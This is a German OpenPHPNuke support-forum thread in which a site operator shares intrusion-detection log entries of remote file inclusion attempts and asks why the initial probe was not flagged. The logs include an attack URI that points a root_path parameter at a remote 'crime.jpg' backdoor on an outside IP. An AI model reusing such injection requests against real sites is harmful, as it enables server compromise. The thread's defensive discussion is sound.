Deutsches Supportforum - OpenPHPNuke

Autor
ArthurDent Registriert: 04.08.2005 Beiträge: 256	EVA und Sperren Geschrieben: 20.06.2011 21:27 Hi Stefan, das EVA den zweiten "Angriff" abgehalten hat, finde ich gut und auch richtig. Darüber braucht man gar nicht zu diskutieren. Es hat mich nur gewundert das der "erste" Test durchgeht. Diese Art des Test und danach so ungefähr 10-30 Angriffe habe ich in letzter Zeit jeden 2-3 Tag. Das nervt einfach nur noch. Danke für die schnelle Antwort, Arthur --------------------------------------------------- Life is a journey, not a guided tour If you think technology can solve your problems you don't understand technology and you don't understand your problems. (Bruce Schneier) Really, I'm not out to destroy Microsoft. That will just be a completely unintentional side effect. (Linus Torvalds) --------------------------------------------------- Linux: Debian 2.6.37 Datenbank: MySQL - 5.5.22 Apache: 2.2 PHP: 5.3.27 OPN: 2.5.7 (Revision 6747)

stefan Wohnort: Münster	EVA und Sperren Geschrieben: 20.06.2011 19:36 Kann man etwas drüber diskutieren. Das erste ist zwar "vermutlich" ein Test ob der Zugriff möglich ist, allerdings ist das nicht zwingend so. Bei dem Zweiten ist das eindeutig. Das File das dort eingeschleust werden soll ist bzw war ne "Backdoor". Siehst du das anderes?

ArthurDent Registriert: 04.08.2005 Beiträge: 256	EVA und Sperren Geschrieben: 20.06.2011 15:40 Hallo, ich bekomme seit einiger Zeit wieder vermehrt Angriffe auf meine Seite gemeldet. Dabei ist mir folgendes aufgefallen, es fängt immer so an: `- Falscher Scriptaufruf. Ausgelöst von der IP Adresse: 173.224.217.126 um 19.06.2011 23:54:00 Die URI die den Fehler ausgelöst hat war: /is/htdocs/wp1117543_OLHEHTAC3U/www//system/article/alltopics.php//master.php?root_path=test?? REQUEST_URI=/system/article/alltopics.php//master.php?root_path=test?? User information UNAME:Gast UID:1` Und danach geht es dann so oder ähnlich weiter: `- [EVA-OUTPUT]This CMS is safe, you should better believe ... Ausgelöst von der IP Adresse: 173.224.217.126 um 19.06.2011 23:54:03 Die URI die den Fehler ausgelöst hat war: /is/htdocs/wp1117543_OLHEHTAC3U/www//system/article/alltopics.php//master.php?root_path=http://74.86.162.32//accounts/inc/tmp/crime.jpg?? REQUEST_URI=/system/article/alltopics.php//master.php?root_path=http://74.86.162.32//accounts/inc/tmp/crime.jpg?? User information UNAME:Gast UID:1` Müsste das EVA-Modul nicht schon denn ersten Aufruf als Fehler/Einbruch melden?? Arthur --------------------------------------------------- Life is a journey, not a guided tour If you think technology can solve your problems you don't understand technology and you don't understand your problems. (Bruce Schneier) Really, I'm not out to destroy Microsoft. That will just be a completely unintentional side effect. (Linus Torvalds) --------------------------------------------------- Linux: Debian 2.6.37 Datenbank: MySQL - 5.5.22 Apache: 2.2 PHP: 5.3.27 OPN: 2.5.7 (Revision 6747)

ArthurDent
Registriert: 04.08.2005
Beiträge: 256

EVA und Sperren

Geschrieben: 20.06.2011 21:27

Hi Stefan,

das EVA den zweiten "Angriff" abgehalten hat, finde ich gut und auch richtig.
Darüber braucht man gar nicht zu diskutieren.

Es hat mich nur gewundert das der "erste" Test durchgeht.
Diese Art des Test und danach so ungefähr 10-30 Angriffe habe ich in letzter Zeit jeden 2-3 Tag.

Das nervt einfach nur noch.

Danke für die schnelle Antwort,
Arthur

---------------------------------------------------
Life is a journey, not a guided tour

If you think technology can solve your problems you don't understand technology and you don't understand your problems.
(Bruce Schneier)

Really, I'm not out to destroy Microsoft. That will just be a completely unintentional side effect.
(Linus Torvalds)
---------------------------------------------------
Linux: Debian 2.6.37
Datenbank: MySQL - 5.5.22
Apache: 2.2
PHP: 5.3.27
OPN: 2.5.7 (Revision 6747)

ArthurDent
Registriert: 04.08.2005
Beiträge: 256

EVA und Sperren

Geschrieben: 20.06.2011 15:40

Hallo,

ich bekomme seit einiger Zeit wieder vermehrt Angriffe auf meine Seite gemeldet.
Dabei ist mir folgendes aufgefallen, es fängt immer so an:

- Falscher Scriptaufruf.



Ausgelöst von der IP Adresse: 173.224.217.126 um 19.06.2011 23:54:00

Die URI die den Fehler ausgelöst hat war:

/is/htdocs/wp1117543_OLHEHTAC3U/www//system/article/alltopics.php//master.php?root_path=test??

REQUEST_URI=/system/article/alltopics.php//master.php?root_path=test??



User information

UNAME:Gast

UID:1

Und danach geht es dann so oder ähnlich weiter:

 - [EVA-OUTPUT]This CMS is safe, you should better believe ...



Ausgelöst von der IP Adresse: 173.224.217.126 um 19.06.2011 23:54:03

Die URI die den Fehler ausgelöst hat war:

/is/htdocs/wp1117543_OLHEHTAC3U/www//system/article/alltopics.php//master.php?root_path=http://74.86.162.32//accounts/inc/tmp/crime.jpg??

REQUEST_URI=/system/article/alltopics.php//master.php?root_path=http://74.86.162.32//accounts/inc/tmp/crime.jpg??



User information

UNAME:Gast

UID:1

Müsste das EVA-Modul nicht schon denn ersten Aufruf als Fehler/Einbruch melden??

Arthur

---------------------------------------------------
Life is a journey, not a guided tour

If you think technology can solve your problems you don't understand technology and you don't understand your problems.
(Bruce Schneier)

Really, I'm not out to destroy Microsoft. That will just be a completely unintentional side effect.
(Linus Torvalds)
---------------------------------------------------
Linux: Debian 2.6.37
Datenbank: MySQL - 5.5.22
Apache: 2.2
PHP: 5.3.27
OPN: 2.5.7 (Revision 6747)

Moderiert von: stefan, spinne
Forum:	Module
Sie schreiben eine Antwort zum Thema:	EVA und Sperren
Gehe zu:	OpenPHPNuke - das Open Source CMS Forum Index

Lade Daten...

Forum